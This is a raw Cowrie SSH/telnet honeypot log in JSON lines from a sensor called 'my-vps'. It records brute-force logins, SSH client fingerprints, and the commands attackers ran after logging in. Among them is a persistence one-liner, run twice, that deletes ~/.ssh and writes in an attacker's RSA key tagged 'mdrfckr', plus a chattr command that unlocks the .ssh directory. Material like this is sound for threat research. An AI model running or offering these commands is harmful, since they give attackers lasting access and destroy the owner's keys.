{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34785,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1596ddc47f9","protocol":"telnet","message":"New connection: 212.227.125.160:34785 (1.2.3.4:23) [session: e1596ddc47f9]","sensor":"my-vps","timestamp":"2025-08-31T05:42:14.326281Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:42:14.709460Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:42:14.710137Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:42:14.964538Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:14.965405Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":47044,"dst_ip":"1.2.3.4","dst_port":22,"session":"eda77bcc13a3","protocol":"ssh","message":"New connection: 43.159.36.188:47044 (1.2.3.4:22) [session: eda77bcc13a3]","sensor":"my-vps","timestamp":"2025-08-31T05:42:15.207829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:15.208642Z","src_ip":"43.159.36.188","session":"eda77bcc13a3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:42:15.353561Z","src_ip":"212.227.235.229","session":"b6c767e11de3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:42:15.383286Z","src_ip":"212.227.235.229","session":"b6c767e11de3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:15.453333Z","src_ip":"43.159.36.188","session":"eda77bcc13a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:16.472745Z","src_ip":"43.159.36.188","session":"eda77bcc13a3"}
{"eventid":"cowrie.session.closed","duration":"29.5","message":"Connection lost after 29.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:17.199430Z","src_ip":"212.227.125.160","session":"9a9b4d587374"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:17.719250Z","src_ip":"43.159.36.188","session":"eda77bcc13a3"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":47060,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1915973394a","protocol":"ssh","message":"New connection: 43.159.36.188:47060 (1.2.3.4:22) [session: f1915973394a]","sensor":"my-vps","timestamp":"2025-08-31T05:42:17.962762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:17.963448Z","src_ip":"43.159.36.188","session":"f1915973394a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:18.207975Z","src_ip":"43.159.36.188","session":"f1915973394a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:42:19.228557Z","src_ip":"43.159.36.188","session":"f1915973394a"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:19.474832Z","src_ip":"43.159.36.188","session":"055a0a40c78c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:19.475719Z","src_ip":"43.159.36.188","session":"f1915973394a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45870,"dst_ip":"1.2.3.4","dst_port":22,"session":"d38867b38a3c","protocol":"ssh","message":"New connection: 212.227.125.160:45870 (1.2.3.4:22) [session: d38867b38a3c]","sensor":"my-vps","timestamp":"2025-08-31T05:42:21.700588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:42:22.467975Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:42:22.468840Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":48784,"dst_ip":"1.2.3.4","dst_port":22,"session":"30e52972a4d8","protocol":"ssh","message":"New connection: 170.64.166.123:48784 (1.2.3.4:22) [session: 30e52972a4d8]","sensor":"my-vps","timestamp":"2025-08-31T05:42:26.263481Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:26.264478Z","src_ip":"170.64.166.123","session":"30e52972a4d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:26.539035Z","src_ip":"170.64.166.123","session":"30e52972a4d8"}
{"eventid":"cowrie.session.closed","duration":12.781505823135376,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:27.107688Z","src_ip":"212.227.125.160","session":"e1596ddc47f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35027,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd0257daa776","protocol":"telnet","message":"New connection: 212.227.125.160:35027 (1.2.3.4:23) [session: bd0257daa776]","sensor":"my-vps","timestamp":"2025-08-31T05:42:27.316281Z"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"ertyuiop","message":"login attempt [moodle/ertyuiop] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:27.639103Z","src_ip":"170.64.166.123","session":"30e52972a4d8"}
{"eventid":"cowrie.login.success","username":"root","password":"Thmpv","message":"login attempt [root/Thmpv] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:42:27.933310Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55742,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d68e0658791","protocol":"ssh","message":"New connection: 212.227.235.229:55742 (1.2.3.4:22) [session: 9d68e0658791]","sensor":"my-vps","timestamp":"2025-08-31T05:42:28.825412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:28.827015Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:28.916074Z","src_ip":"170.64.166.123","session":"30e52972a4d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:29.114760Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd0!","message":"login attempt [root/P@ssw0rd0!] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:42:30.305414Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:42:30.903083Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:42:30.903854Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:42:30.904808Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:31.193562Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:42:31.789582Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T05:42:31.790318Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:42:31.827327Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:42:31.827989Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:42:32.118158Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:32.119425Z","src_ip":"212.227.235.229","session":"9d68e0658791"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57122,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e9357f0eaf2","protocol":"ssh","message":"New connection: 212.227.235.229:57122 (1.2.3.4:22) [session: 9e9357f0eaf2]","sensor":"my-vps","timestamp":"2025-08-31T05:42:32.405193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:42:32.406158Z","src_ip":"212.227.235.229","session":"9e9357f0eaf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:42:32.694484Z","src_ip":"212.227.235.229","session":"9e9357f0eaf2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:33.077440Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:33.079271Z","src_ip":"212.227.125.160","session":"d38867b38a3c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:33.887286Z","src_ip":"212.227.235.229","session":"9e9357f0eaf2"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:42:34.694600Z","src_ip":"212.227.235.229","session":"b6c767e11de3"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:42:35.177526Z","src_ip":"212.227.235.229","session":"9e9357f0eaf2"}
